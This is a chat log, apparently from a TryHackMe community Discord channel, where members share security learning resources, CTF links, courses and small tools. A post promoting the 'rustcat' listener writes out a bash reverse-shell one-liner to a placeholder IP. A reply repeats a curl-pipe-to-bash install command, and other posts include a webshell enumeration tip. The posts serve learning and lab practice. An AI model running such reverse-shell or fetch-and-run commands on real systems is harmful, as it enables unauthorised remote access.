<@!671329958089457664> Here you go just so i dont forget i will send it now
did u
just copy my idea?
na u didnt
tranquil shuttle
did u
i meaaaan i have always had resources in my notes for the past year i can say the same thing in reverse, but i just wanted to make it more accessible
light crystal
sry
tranquil shuttle
light crystal
just saw ur
it contains more stuff
lemme copy some 😂
and link 1 to ur repo
@tranquil shuttle ill link to ur repo in my repo u can do the same 😂
tranquil shuttle
hi does anyone have any resources for bash scripting? (free please)
would recommend exericism.io to learn bash
and also you can try doing the rooms you sharwd the screenshot for
they are preety noicee and helpfull
also rooms about linux commands will help a lot
shut ferry
+rep @tranquil shuttle ty
odd sinewBOT
Gave +1 Rep to @tranquil shuttle
shut ferry
savin for later defintiely
tranquil shuttle
no problemo
fast wraith
really good blog post on SDR and creating a trunk scanner
https://www.blackhillsinfosec.com/using-sdr-to-build-a-trunk-tracker-police-fire-and-ems-scanner/
midnight warren
Hey guys,
If you're a fan of tmux, it's always useful to keep a dedicated script for connecting with **THM **network via OpenVPN and spawn multiplexer windows for convenience. I wrote a simple bash script to do these jobs with a one-click launcher.
I'm pretty much a beginner and would appreciate suggestions/improvements
https://gist.github.com/bijoy26/002e5b6734a277bc0c1fafb19283805a
glacial gazelle
Hey guys,
If you're a fan of tmux, it's always useful to keep a dedicated scrip...
hey, that's pretty neat
good job!
people have encrypted openvpn files?!
idle mural
Don't touch my boyfrend
Your boyfriend is safe da
fickle mulch
gentle shuttle
ENCRYPTED REVERSE SHELLS FTW 🙂 - easy use encrypted reverse shell: https://github.com/watchdog2000/encroshell/
fast wraith
pretty damn cool find
https://twitter.com/cyb3rops/status/1395009709787258882
odd quest
Yee, Muir does this in Wreath which is neat.
flint bison
Yee, Muir does this in Wreath which is neat.
Is this something he only does in the "internal"/"creation" part of the room? I don't recall seeing this when I did Wreath, but maybe I just forgot.
odd quest
Is this something he only does in the "internal"/"creation" part of the room? I ...
It's in the section for the SSH pivoting
The key is created but has limited scope so that it can't be used for much more than the proxy
Specifically the reverse ssh pivot
flint bison
Gotcha. I'll have to go back and take a look at it again. I must've forgotten it
spark hedge
shut ferry
Very helpful for OSINT's rooms
https://github.com/jivoi/awesome-osint?utm=twitter/GithubProjects
light crystal
Lhost - Ur IP address to recieve connections on
lport - local port to reciece connections on
rhost/s - the machine u wanna attack
rport - remoter port on a machin u wanna attack
for example if there is a ftp vuln u need to set rport to the specific port running ftp with rhost as the IP ur attacking
for those who are new with metasploit a small options guide
finite fossil
Nmap Firewall Evasion
https://youtu.be/NfLdXre3Rws
light crystal
odd quest
@shut ferry Hi.
That video is private. In addition, please keep all conversation in English in this discord.
shut ferry
https://www.youtube.com/watch?v=f38oRxybF88
This is the video that I uploaded this week
odd quest
If you're posting tryhackme writeups, please post them in #thm-community-media
fast wraith
really good primer on note-taking methodology in Obsidian - specifically meant for bug bounty but applicable to any other domain too
https://www.youtube.com/watch?v=r9xa5kMNVpQ
night ether
any cool books/blogs/talks/videos on o365/exchange security?
fast wraith
i like the benchmarking and hardening guides that CIS releases, this is a little outdated but I think you can find an updated version on their website if you register
http://www.itsecure.hu/library/image/CIS_Microsoft_Exchange_Server_2013_Benchmark_v1.1.0.pdf
night ether
i like the benchmarking and hardening guides that CIS releases, this is a little...
awesome thank you x
odd sinewBOT
Gave +1 Rep to @fast wraith
jagged tiger
any cool books/blogs/talks/videos on o365/exchange security?
@fast wraith and @night ether - CIS has a new version of the Benchmarks for Exchange server 2016. You'll have to register (for free) with CIS to download the documents, though. https://www.cisecurity.org/benchmark/microsoft_exchange_server/
gleaming wind
https://www.hacksplaining.com/lessons
Nice find! - Thank you
odd sinewBOT
Gave +1 Rep to @light crystal
balmy sun
FREE - Python For Ethical Hackers 2021
https://www.udemy.com/course/python-for-ethical-hackers-new/?couponCode=FREETIME
FREE - IP Addressing and Subnetting – Zero to Hero
https://www.udemy.com/course/ip-addressing-zero-to-hero/?couponCode=MAY21FREE
udemy coupons 
flint bison
FREE - Python For Ethical Hackers 2021
https://www.udemy.com/course/python-for-e...
That third one isn't free, but the first two are. Thanks!
odd sinewBOT
Gave +1 Rep to @balmy sun
night ether
<@!320305132321505284> and <@!180392440945967104> - CIS has a new version of the...
awesome, thanks!
odd sinewBOT
Gave +1 Rep to @jagged tiger
shut ferry
FREE - Python For Ethical Hackers 2021
https://www.udemy.com/course/python-for-e...
what a legend ty
odd sinewBOT
Gave +1 Rep to @balmy sun
short sleet
https://twitter.com/vysecurity/status/1396458990708543488?s=21
thats the thing i always wondered what if we just used workers which are already inside cloudflare network
like cloudflare wouldnt rate limit their own ips
hasty fox
I believe cloudflare made the move/is making the move to "untrust" some of their ip ranges for this reason in addition to things like the 1.1.1.1 WARP (specialized VPN)
short sleet
I believe cloudflare made the move/is making the move to "untrust" some of their...
theoretically they cant atleast not worker
because if they do then all projects hosted behind that proxy address will get rate limited too
for no reason
sturdy shell
fast wraith
Registration started for the TraceLabs OSINT CTF, competed in the last one and had a ton of fun
https://twitter.com/TraceLabs/status/1396491565699321863
fickle mulch
https://github.com/KathanP19/HowToHunt
Thank you for sharing this awesome content
odd sinewBOT
Gave +1 Rep to @tranquil shuttle
tranquil shuttle
np
heady atlas
Registration started for the TraceLabs OSINT CTF, competed in the last one and h...
I just registered for that one yesterday! It'll be my first OSINT CTF, looking forward to it!
south marlin
how often Trace Labs do these per year?
fast wraith
nice! idk if they still accept everyone, but the Trace Labs slack also has a long-term operations channel where they run real-life cases in a similar format to the CTF, i did a few and it's really good practice
fast wraith
how often Trace Labs do these per year?
im not sure, this next one coming up would be their 2nd this year, its not that often though
south marlin
I hope that I can join the next one.
marble jacinth
shut ferry
Small tips :
During a CTF ||more at easy level ||when you have to access a webserver and upload a simple webshell, most of the time the " cat " command will be disabled
to make your enumeration a little bit harder, ||I believe it's the case in the Rick & Morty room|| so don't forget you can still use the reversed one " tac " it'll have the same effect as the normal one and you'll still be able to correctly enumerate the filesystem
bright osprey
Wait what?
shut ferry
The « tac » command has the same effect as the « cat » one
But it will print files in reverse, you can test it in your own terminal
shut ferry
Yup that’s right, but when you have only one line it will print it out the same as cat, useful when you can’t use « cat » because disabled
light crystal
yea right
shut ferry
It’s not something very useful but still helps sometime
shut ferry
Thanks 
abstract plaza
Registration started for the TraceLabs OSINT CTF, competed in the last one and h...
Nice. I've been looking for one of these.
fast wraith
new blog post on how to write a slow and bad port scanner in Go
https://droogy.tech/post/slowgo/
leaden blaze
Many CTF Players Face Problems Connecting To Openvpn Servers Simply Because They Are Behind A Firewall That Blocks Outbound And Inbound Traffic, I Wrote This With An Example On How To Access TryHackMe
OpenVPN Server.
topaz gulch
Many CTF Players Face Problems Connecting To Openvpn Servers Simply Because They...
Nice work!
Just as a tip, you can streamline that a lot
Have a look into sshuttle (do Wreath if you haven't already) -- that will completely cut out the need for proxychains
You can also do it with iptables rules, effectively turning your EC2 instance into a router; but, if you do that, please restrict the IPs that can connect to it
Furthermore, you could potentially also set up your own OpenVPN server and effectively tunnel through two VPNs, which would also work, in theory
One of the first two options will be faster though 🙂
For the sake of simplicity, I recommend sshuttle because it will already work with the infrastructure you have running there, no new configurations necessary
void patio
FREE - Python For Ethical Hackers 2021
https://www.udemy.com/course/python-for-e...
Nooooo, I was too late rip
fast wraith
cool little cheat-sheet project
https://github.com/chubin/cheat.sh
lyric heron
cool :)
dreamy coral
idk if im on the correct channel but is the CISCO Self Study Guide by Steve McQuerry a good resource for networking?
gleaming wind
cool little cheat-sheet project
https://github.com/chubin/cheat.sh
Nice, that is pretty sweet!
tranquil shuttle
idk if im on the correct channel but is the CISCO Self Study Guide by Steve McQu...
seems like a nice book, but if you are just starting check out the free resources
like tryhackme, network chuck has some good intro videos
woven forge
Wanted to ask if there is a place/website that offers mentorship for a Junior Level Pen-tester
shut ferry
Wanted to ask if there is a place/website that offers mentorship for a Junior Le...
“Battleship” maybe?
jaunty pulsar
battleship what?
faint sluice
also The Cyber Mentor offers paid mentorship
strange ice
Hi everyone,
I remember this group have the channel for shared book and pdf . Currently, it's moved , right ?
fringe spire
Hi everyone,
I remember this group have the channel for shared book and pdf . Cu...
you mean #bookclub ?
strange ice
you mean <#679099130320125952> ?
Not sure, last time to access this server maybe 2019. In #bookclub , I not seen someone share files.
azure widget
Hi everyone,
I remember this group have the channel for shared book and pdf . Cu...
Are you talking about pirated books and PDFs?
strange ice
Are you talking about pirated books and PDFs?
Yes
odd quest
@strange ice We don't do that here, and we never have. Piracy is illegal, and we do not tolerate it here. Is that clear?
strange ice
<@!416596986070958092> We don't do that here, and we never have. Piracy is illeg...
Oh !sorry, I might remember the wrong group.
shut ferry
https://github.com/0xd1912e/KillAll-SSH/blob/main/ssh.sh
a bash script used to kill all sessions in your ssh, i made this for myself to play koth and make it easier for myself but you guys are of course to use it freely, @fluid galleon made the same thing but wouldn't share me the code so i just had to make it myself and like the nice dood i am, all you guys can use it :D .
light crystal
For those who dont know https://education.github.com/pack
fickle mulch
For those who dont know https://education.github.com/pack
I can not claim domain name using this service. After giving all the info, they asks for money 😕
light crystal
shut ferry
Anyone know where I can get a video that actually explains what all this scripting means
I meant a tryhackme video that explains task1 in Scripting room
sullen palm
what's the issue though, this example is pretty straight-forward
sterile vapor
so basically, the first lines of code opens a file called b64.txt and reads it the second lines use b64decode to decode the message in base64 i guess and then prints out the decoded message
its python code btw
shut ferry
what's the issue though, this example is pretty straight-forward
That's the issue, is that this writeup is pretty straight forward lol.
Like what does the _ mean ?
and the f:
light crystal
for _ in range(50):
print(_)```
this will print all the numbers between 0-50_ stores the value
u can also change it to for i in range
shut ferry
```
for _ in range(50):
print(_)```
this will print all the numbers between...
Okay, seems like i need to watch some basic bash scripting videos on YouTube that actually explains what all this means. The write doesn't explain just gives you the code
sullen palm
yeah, I've never used for _ in range, always for i in range
shut ferry
yeah, I've never used for _ in range, always for i in range
Yeah this is what i'm saying
I don't know what the f: meant either
light crystal
but either ways the code will work
sterile vapor
yeah, I've never used for _ in range, always for i in range
yeah, i use "i" then "j" etc. lol
light crystal
I don't know what the f: meant either
where?
light crystal
format
shut ferry
i think he means f.read
yep
light crystal
a = 'Hi'
print(f"{}",a)```
light crystal
i think he means f.read
f.read okkk
light crystal
```
a = 'Hi'
print(f"{}",a)```
@shut ferry
fast wraith
"f" is a bad variable name, it is the object that is used to read the file
shut ferry
Coding is > then hacking but then Hacking is also > then coding 😦
light crystal
f means format
sterile vapor
so in the first line with open('b64.txt') as f it opens the file and stores it in f then that is being used in msg = f.read()to read the file and store it in "msg"
shut ferry
life is hard
shut ferry
so in the first line ``` with open('b64.txt') as f``` it opens the file and stor...
I semi understood this part
light crystal
with open('b64.txt') as f: means that he wants to name it as f instead of b64.txt
light crystal
means he can say f.read() instead of b64.read
light crystal
How do you guys memorize all this !
super easy!
sullen palm
I mean you don't memorize it per se, it's just the syntax of the language, python is the easiest really
light crystal
oh lets switch to #programming
fast wraith
if you want some good scripting practice, cactuscon had some solid beginner challenges and they also teach you a fair bit in each module
https://samsclass.info/124/VP2020.htm
shut ferry
Before we leave, does anyone recommend any good beginner bash course vids? Codecademy and Freecodecamp are cool but i want to watch first as it will help me better understand visually
sterile vapor
then for _ in range(50) enumerates the code msg = base64.b64encode(msg) 50 times, and base64 and b64decode are Methods that are being imported from the library base64 in line 1 (import base64) then at the end it just prints the decoded message
shut ferry
then ``` for _ in range(50)``` enumerates the code ```msg = base64.b64encode(ms...
see i need to learn where i can get the base64encode syntax etc..
i guess i need to study the modules
sterile vapor
and _
is just a variable that we dont need to use anymore so _ is being used here, if you would want to use that for something you could use any letter etc.
shut ferry
and libraries
sullen palm
you import it in the beginning of the file
import base64
so you want to learn bash and not python?
shut ferry
Just bash
sterile vapor
import base64 imports the library and allows you to use any methods in that library
shut ferry
I want to ultimately become a bug bounty hunter
i want to use bash to my full power and advantage
make tasks more easier
specifically for bug bounty use
sullen palm
hopefully someone can chime in with videos, I don't learn that way
shut ferry
I'm a hybrid
sterile vapor
@shut ferry https://youtu.be/rfscVS0vtbw?t=11561 here are some code examples for Reading and writing files
shut ferry
Oooooooo o.0
sullen palm
tho ultimately I'd say it's best to start from the beginning and learn the fundamentals
sterile vapor
@shut ferry i would suggest learning the basics of Python (learining how to code simple functions and algorithms) and then move on to javascript and try to implement it into some website with Hmtl
shut ferry
I'm gong to stick with bash.
learn bash as much I can then switch over to python if need be
I think Javascript would be my second.
light crystal
@shut ferry check dm regarding it^
shy glacier
https://h4r1337.gitbook.io/ctf/thm/unstable-twin
My first writeup... Feel free to say any suggestions and errors.
light crystal
good1 @shy glacier
shy glacier
Thanks bro
cerulean viper
luckily came across this today! Tag all those who love clouds xD
https://pages.cloudthat.com/az-104-free-training-india/
light crystal
peak leaf
Make your binexp life easier
odd quest
https://gist.github.com/NinjaJc01/e309be8a817abc56477b4e1196eb16f2
Looking at a bunch of pwdump output (eg you just dumped a domain controller), and you want to immediately get that into hashcat/john? Try this. Parses pwdump format output (like meterpreter's hashdump) and provides username:ntlm format which john or hashcat can easily use.
sonic abyss
did you do this in a rush or forget to use with() 
also can do .read().strip() instead of the "".join() I believe
odd quest
did you do this in a rush or forget to use `with()` <:pepehands:6580679059880018...
It was written in about 3 minutes because I had a like... whole page of pwdump format hashes from a domain controller
It was originally just using a triple quoted string for the hashdump
shut ferry
That is awesome ! @shut ferry
shut ferry
That is awesome ! <@456226577798135808>
ayy thanks roki 😁
shut ferry
any1 have any resources for the basics basics of buffer overflow
https://tryhackme.com/room/sudovulnsbof
doing this right now but i definitely want more
fringe spire
https://tryhackme.com/room/sudovulnsbof
doing this right now but i definitely w...
Also watch: https://www.youtube.com/watch?v=1X2JGF_9JGM
shut ferry
thank you!
light crystal
https://aksheet10.medium.com/powerview-common-commands-60f9a9ad6a80
just my cheatsheet
please tell me if you want to change sometime or something is wrong
balmy sun
Academy (http://academy.tcm-sec.com) - 50OFFSITEWIDE
Udemy - 50OFFSITEWIDE-UDEMY3
TCM Coupons
50% off
fast wraith
Here's a utility I made as part of a kata for working with bytes in python, some particularly evil challenge makers might be able to make use of it to split flags up or obfuscate other things
https://github.com/Droogy/Splitr
sonic abyss
Nice! Just a heads up, using with() automatically closes the file :))
fast wraith
Nice! Just a heads up, using `with()` automatically closes the file :))
ah thank you, good to know, i remember reading somewhere that using close() is best practice - might've been a python2 thing
odd sinewBOT
Gave +1 Rep to @sonic abyss
sonic abyss
Yeah, if you use it without the with() statement, it is best to use close() as you said
shut ferry
https://0xevan.medium.com/metasploit-write-up-bfdc65d397b0
first ever blog
light crystal
good1 @shut ferry
odd sinewBOT
Gave +1 Rep to @light crystal
shut ferry
thankssss swann
odd sinewBOT
Gave +1 Rep to @stone linden
oak quiver
Impressive
And actually the first article that actually made me understand what Metasploit is... :/ Really helped understand what the I'm doing in the room xD
shut ferry
Do not forget to get your free copy of the INE IT Training Courses : Starter Pass, they give amazing resources for free
fickle mulch
Do not forget to get your free copy of the INE IT Training Courses : Starter Pas...
INE also offering free eJPT certification exam with their subscription plan
balmy sun
Here's a utility I made as part of a kata for working with bytes in python, some...
Maybe you can do an option for recursively splitting?
so like split until the length is 50mb
It's already handy, but that would make it even better
fast wraith
Maybe you can do an option for recursively splitting?
so you mean an option so it splits into more than 2 files? I was thinking about that, just too lazy to implement haha - PRs are always welcome I will most likely merge anything within reason 😄
lol gonna use this for security awareness training
http://www.shadyurl.com/create.php
balmy sun
so you mean an option so it splits into more than 2 files? I was thinking about ...
ahh okay.. Just a question, but are you opening the files in byte mode for a reason? because I'm pretty sure you can't do string manipulation now
fast wraith
ahh okay.. Just a question, but are you opening the files in byte mode for a rea...
yeah I am, I tried a few different ways of opening the files and writing bytes/strings/ints to them and found what I ended up with just works - im sure there's better ways of doing it
shut ferry
And actually the first article that actually made me understand what Metasploit ...
you don’t understand how much this means to me dude, thank you so much.
odd sinewBOT
Gave +1 Rep to @oak quiver
light crystal
shut ferry
crimson thunder
this is the way
jaunty pulsar
does some one has a paper tthat explain how to get revshell through pivoting?
with out metasploit
flint bison
Not a paper, but the #wreath-network room has some good info on pivoting
shut ferry
dirsearch, just found it and it's so much easier than gobuster
extremely fast as you can see :)
flint bison
the latest kali also has feroxbuster, which can do recursive scans I think
jaunty pulsar
dirsearch also can use recursive "-r"
crimson thunder
odd quest
https://www.sans.org/security-resources/posters/pen-testing/bloodhound-cheat-she...
That's super useful for me right about now, thank you so much
odd sinewBOT
Gave +1 Rep to @crimson thunder
crimson thunder
hey, I'm glad 😄
shut ferry
https://guesstheflag.zh3r0.com/
ctf going on in 12 hours, open to everyone if you want to join, prizes listed above.
crimson thunder
winners can choose between cyberops associate, cyberops professional, or ccnp security (all options are course+exam voucher)
next hollow
guys any collection for most useful android tools and docs for penetration testing (for both of remote and local attacks)
fast wraith
job hunting stream with banjo - he's currently helping me look for a SOC job 😄
https://www.twitch.tv/banjocrashland
shut ferry
inherently relative https://en.wikipedia.org/wiki/High-level_programming_language#Relative_meaning
saving this for myself other people might use it too
shut ferry
If anyone is in need of cyber/infosec books have a look at this tweet, a bunch of peoples have replied with their top books
https://twitter.com/cybersecurityda/status/1400812992506302465?s=21
lapis herald
odd quest
@dull grove PUBG gaming montages are not really relevant here.
latent mountain
anyone here passed linux + and can recommend any good resources that got them through it?
night ether
barren vault
light crystal
odd quest
@grand anchor Please use #thm-community-media for posting writeups
light crystal
https://engineer-vaibhavt.medium.com/tryhackme-writeup-cc-pentesting-76a0efed9b1...
id rec using markdown format for writing...but good overall
shut ferry
New Netcat Alternative Made In Rust
As you guys may know netcat is a thing... I pretty old thing.
So I decided to make a newer more modern netcat alternative in rust (rustcat)
Why should you use rustcat instead of netcat:
- It is more modern 💻
- Made in rust ⚙️
- Has colors to make it fancier 🎨
- Daily Maintained 🧑🏭
How to get a rce with it?
- Start up a listner on specified port ex. (rc -lp 55600) 📡
- Open a reverse shell on a target machine with for example(/bin/bash -c 'bash -i >& /dev/tcp/your-ip-running-the-listener/55600 0>&1') 🛰️
- Boom you got yourself a nice rce
More features will be added in the future.
Also remember to give the repo a star⭐ and create a issue if you have an idea or find a bug
shut ferry
Thank you 🙂
glacial gazelle
balmy merlin
@prisma bison
balmy merlin
Malicious links when I checked and possibly pirated content unsure tho
prisma bison
Malicious?
They all lead to Amazon, I can’t check if they’re redirect because I’m on mobile
@hardy void Can you avoid posting referral links please, just link the book itself
hardy void
Only book name @prisma bison ok
hardy void
Malicious links when I checked and possibly pirated content unsure tho
Not malicious they are Amazon Link from Amazon
balmy merlin
Alright when I check it came up as malicious but oh well
hardy void
I deleted because i need permission from mod can i post my info book with Amazon Link that why deleted they are affiliated link
remote wind
They all lead to Amazon, I can’t check if they’re redirect because I’m on mobile
You can use wheregoes website to check the redirect without actually visiting website
lyric heron
**New Netcat Alternative Made In Rust**
As you guys may know **netcat** is a th...
cool! thanks gotta install and try
odd sinewBOT
Gave +1 Rep to @quartz tiger
shut ferry
cool! thanks <:blobheart:689626579479035913> gotta install and try
:)) Also keep in mind its in a very early stage
And more features will be added
lyric heron
hmm, is this my machine?
shut ferry
Is your system 64 bit or 32 bit?
shut ferry
Hm
lyric heron
install from source works :)
shut ferry
bash <(curl -s https://raw.githubusercontent.com/robiot/rustcat/main/latestinstall.sh)
That command?
lyric heron
yep
shut ferry
Cool :))
lyric heron
although
i would not rely on snap to install rustup
i did sudo apt install rustc cargo libasound2-dev libssl-dev pkg-config
maybe not all of them needed but 🤷
shut ferry
Oh yeah, the latestinstall need some fixes, I just made it real quick for easier build and install
shut ferry
maybe not all of them needed but 🤷
Well as long as it works its fine 🙂
And if you want to improve the file, you can always feel free to create a fork and edit and create a pull request :))
grand anchor
id rec using markdown format for writing...but good overall
Thanks 👍
odd sinewBOT
Gave +1 Rep to @light crystal
shut ferry
need all and everything forensics please i have a week before this ctf and barely know anything about it
fast wraith
can't think of a better intro than this - there's a lot of different parts to this case (network forensics, disk analysis, memory analysis, etc.,) so I would just approach each part separately . This will take you a few days to go through for sure
https://dfirmadness.com/the-stolen-szechuan-sauce/
I also personally have a done a bunch of exercises from here which focuses on network forensics
https://www.malware-traffic-analysis.net/training-exercises.html
shut ferry
I am currently trying out the Utopia Ecosystem by the 1984 Group. So far it is just a massive freeze fest
overall pretty good from what I have been able to work with
tranquil shuttle
https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-che...
Thanks for sharing seems super cool
odd sinewBOT
Gave +1 Rep to @glacial gazelle
ocean plank
🙄
night plinth
shut ferry
https://beej.us/guide/ -> this guy was a great fun to read back in the day (his guide to network programming was awesome, and the one on Unix IPC was a lot better than my uni teacher's notes as well). I see he has new ones as well. If you enjoy some humor with your content, you might like this as well. Totally free
(gotta cut down on "as well")
fickle mulch
https://sushant747.gitbooks.io/total-oscp-guide/content/vim.html
I will definitely bookmark it
fast wraith
The first of ESET's tri-annual threat report
https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf
gritty barn
https://gist.github.com/muff-in/ff678b1fda17e6188aa0462a99626121 @remote wind @white pivot
remote wind
https://gist.github.com/muff-in/ff678b1fda17e6188aa0462a99626121 <@7793932582866...
Saw that in morning lol, thanks
odd sinewBOT
Gave +1 Rep to @gritty barn
white pivot
Gracias amigo!
light crystal
credit ->@cerulean viper
steady wadi
so the lessons, at least in the beginner section, recommend "nmap -A -p-" for port scanning, which is... a lot. Anyone got resources for good nmap methodology? I've wound up just adding -T5... which obviously I know shouldn't be done outside of practice lol
flint bison
Don't do -A
scan all ports if you need to (some rooms tell you what port range to scan), then only do -A on those ports
or not -A at all. Maybe you only need -sV or something
shut ferry
so the lessons, at least in the beginner section, recommend "nmap -A -p-" for po...
If time is something you want to save, then I would recommend using rustscan.
It searches for open ports only at first, and when scan is complete it will then scan only the open ports with nmap. it saves a lot of time 🙂
steady wadi
It searches for open ports only at first, and when scan is complete it will then...
Thank you 🙂
odd sinewBOT
Gave +1 Rep to @frigid perch
distant gust
Does anyone have suggestions for a solid technical writing course/resource? I really need to up my reporting game
noble tangle
need all and everything forensics please i have a week before this ctf and barel...
hopefully these will come in handy:
https://twitter.com/blueteamblog/status/1351654657521819657
https://pivotproject.org/challenges/digital-forensics-challenge
https://digital-forensics.sans.org/community/challenges
https://web.archive.org/web/20180730224725/http://forensicscontest.com/2010/05/21/puzzle-6-anns-aurora
https://web.archive.org/web/20180816194924/http://forensicscontest.com/2010/07/08/puzzle-6-answers
https://cyberdefenders.org/
https://cyberlaure.wordpress.com/
https://www.incidentresponse.com/playbooks/
https://www.appliedincidentresponse.com/resources/
https://letsdefend.io/
https://blueteamlabs.online/
noble tangle
need all and everything forensics please i have a week before this ctf and barel...
https://www.sans.org/reading-room/whitepapers/incident/paper/37920 this one is great too
shut ferry
this seems to be useful. I read about it through another beginner in cyber security on reddit and have decided to try it out.
glacial gazelle
Obsidian is great, it takes a little leg work to get it set up nicely, but can be incredibly versatile if you utilise all it's features
I believe Ippsec has a quick walkthrough at the start of one of his videos, let me try find that
shut ferry
Are you talking about this one ?
shut ferry
Are you talking about this one ?
https://www.youtube.com/watch?v=Z3Lj_YN0crc
Thank you!
odd sinewBOT
Gave +1 Rep to @spare finch
shut ferry
Obsidian is great, it takes a little leg work to get it set up nicely, but can b...
I am using it on windows and I am comparing it to notion side by side
shut ferry
hopefully these will come in handy:
https://twitter.com/blueteamblog/status/1351...
holy shit thank you
odd sinewBOT
Gave +1 Rep to @noble tangle
shut ferry
Thank you!
You’re welcome
jaunty pulsar
https://sushant747.gitbooks.io/total-oscp-guide/content/vim.html
it's gone bro
fast wraith
pretty cool new exploit
https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
barren vault
fast wraith
Microsoft's API to query security updates
https://api.msrc.microsoft.com/cvrf/v2.0/swagger/index
shy glacier
odd quest
Rumour is, there's a room on that coming
shut ferry
hi! Does anybody recommend resources to learn Windows security topics in a more structured way? I suppose out of experience I've been ok with the *nix world, but have been having a harder time wrapping my head around the topics in the Windows rooms I've tried so far (active directory, kerberos, even just basic privesc on a windows machine)
I'm about to start a big google search on the topic, but happy to look at any recommendations 🙂
next marlin
Complete walkthrough of mustacchio room
https://youtu.be/RBLrM4Nm4WE
odd quest
@next marlin #thm-community-media
devout coral
https://obsidian.md/
this seems to be useful. I read about it through another b...
is there any body know how i can download and install obsidian in debian
next marlin
@odd quest dude channel read-only
fallow tiger
is there any body know how i can download and install obsidian in debian
You download the appimage and then you can start it ( you probably need to chmod +x it)
jagged tiger
is there any body know how i can download and install obsidian in debian
You have 3 options right there on the Downloads page - IIRC Debian has packages that support any of the 3 methods.
elfin geyser
toxic hearth
@devout coral I have it installed on Kali, but if you do not have the packages needed just google for them on Debian and install one by one. that is what I did
you can use snapd i didnt
spiral zodiac
Twitter
prisma bison
Meowware 
spiral zodiac
Jabba 
crimson thunder
do you guys know any good hands on guides for elastic?
tepid patio
do you guys know any good hands on guides for elastic?
Elastic search?
crimson thunder
Elastic search?
yup, sorry
azure widget
Nice software to cusotmize your windows more officially by Microsoft
@arctic mist we’ve been compromised!
tranquil shuttle
fast wraith
thinking about going to this and might be able to get work to chip in 😄
https://blueteamcon.com/
flint bison
work paying for stuff is always good 🙂
next marlin
BlizzardWrap - CLI tool for encoding and decoding.
Supports:
URL, MorseCode, Atbash, Vigenere Ciphere, PhoneCode, WigWag, ASCII,HTMLEntities, A1Z26, Binary, Hexadecimal, Hexcode, ROT, Base64, Base32, Base16, Base85, Binary2Hex, Hex2Binary encoding & decoding
https://github.com/prodigiousMind/blizzardwrap
verbal siren
one of my goals is to learn how to understand firewall logs. I ask our admin where can I start for that goal. He said I should learn the core general knowledge of routing/switching and firewall so that I can understand the terms.
any resources for this?
faint sluice
any good networking book, computer networking: top down approach has been recommended before https://www.amazon.com/Computer-Networking-Top-Down-Approach-7th/dp/0133594149/
toxic hearth
one of my goals is to learn how to understand firewall logs. I ask our admin whe...
CCNA
jagged tiger
with the CCNA approach, downloading packettracer and doing the CISCO online class for it will help start you down the path: https://www.netacad.com/courses/packet-tracer
patent swan
fast wraith
nice project that makes managing all the Malware/RE tools ezpz
https://github.com/mentebinaria/retoolkit
sturdy shell
nice project that makes managing all the Malware/RE tools ezpz
https://github.co...
That project is BEAUTIFUL
fast wraith
That project is BEAUTIFUL
no more having to fiddle around in the registry and making custom context menus :p
sturdy shell
that's it!
next marlin
Complete walkthrough of c4ptur3-th3-fl4g room:
https://youtu.be/mdpnBG6TRW8
odd quest
@next marlin Again, #thm-community-media for writeups
south marlin
you should verify your profile first.
fallow tiger
@calm ermine
calm ermine
-ban @nova narwhal Steam phishing link.
odd sinewBOT
🔨 Banned Alex Sander S Rocha#1738 indefinitely
calm ermine
+rep @fallow tiger
odd sinewBOT
Gave +1 Rep to @fallow tiger
fallow tiger
he wrote in multiple channels. You might need to check them
shut ferry
These are for the older version of CHFI (v9). The later version goes heavier into cloud and memory forensics from what I hear, but these are still helpful notes. And learning a little about the various topics listed in these can help anyone in their cyber career.
P.S. - Keep an eye out early next week for an announcement from me.
tribal gull
fast wraith
pretty in depth scanning technique guide
https://github.com/adulau/active-scanning-techniques
cerulean viper
fickle mulch
https://twitter.com/The_MunX/status/1405494891036151812?s=19
vouchers will be awarded to South Africans.
warped pulsar
What happened?
fast wraith
good resource for report-writing skills
https://developers.google.com/tech-writing/one
shut ferry
Thanks @fast wraith
odd sinewBOT
Gave +1 Rep to @fast wraith
light crystal
shut ferry
Thanks Brainy
odd sinewBOT
Gave +1 Rep to @light crystal
light crystal
credit vertey!
fast wraith
good deal on a good printer, usually retails ~$250
https://www.amazon.com/Creality-Certified-Removable-Mainboard-220x220x250MM/dp/B08QZHS6TK?dchild=1&keywords=ender+3+pro&psr=PDAY&qid=1624311890&s=prime-day&sr=1-1&linkCode=sl1&tag=ctrlpew-20&linkId=00eb17b3ae269d73562112d59ea0d797&language=en_US&ref_=as_li_ss_tl
coarse breach
A talk on naval cyber security in the real world. https://www.plymouth.ac.uk/research/plymouth-research-festival/2021-cyber-ship-lab
willow zinc
fast badger
Any recommendations on resources to learn burp?
.png){kind=link}
fickle mulch
Any recommendations on resources to learn burp?
@echo estuary has a course on udemy. I have found it useful. You can try
fast badger
thank you!
fast wraith
windows shellcode generator
https://github.com/netspooky/kimagure
light crystal
Education should be a right, not a privilege. We shouldn't price those out who cannot afford it. Below you will find coupons for our Practical Ethical Hacking course at prices of your choosing:
PAY5
PAY10
PAY15
PAY20
PAY25
PAYITFORWARD (free)
https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course
thanks to TCM again!
shut ferry
Heyo! Cool AD resource: https://zer1t0.gitlab.io/posts/attacking_ad/
upper cloud
Get it
By The Cyber Mentor
It's an amazing course
Education should be a right, not a privilege. We shouldn't price those out who cannot afford it. Below you will find coupons for our Practical Ethical Hacking course at prices of your choosing:
PAY5
PAY10
PAY15
PAY20
PAY25
PAYITFORWARD (free)
https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course
By The Cyber Mentor
light crystal
Education should be a right, not a privilege. We shouldn't price those out who c...
@upper cloud lol
light crystal
i had already posted it 2 msgs above lul
light crystal
Education should be a right, not a privilege. We shouldn't price those out who c...
@hollow phoenix
wanton estuary
i had already posted it 2 msgs above lul
;)
upper cloud
i had already posted it 2 msgs above lul
Oooo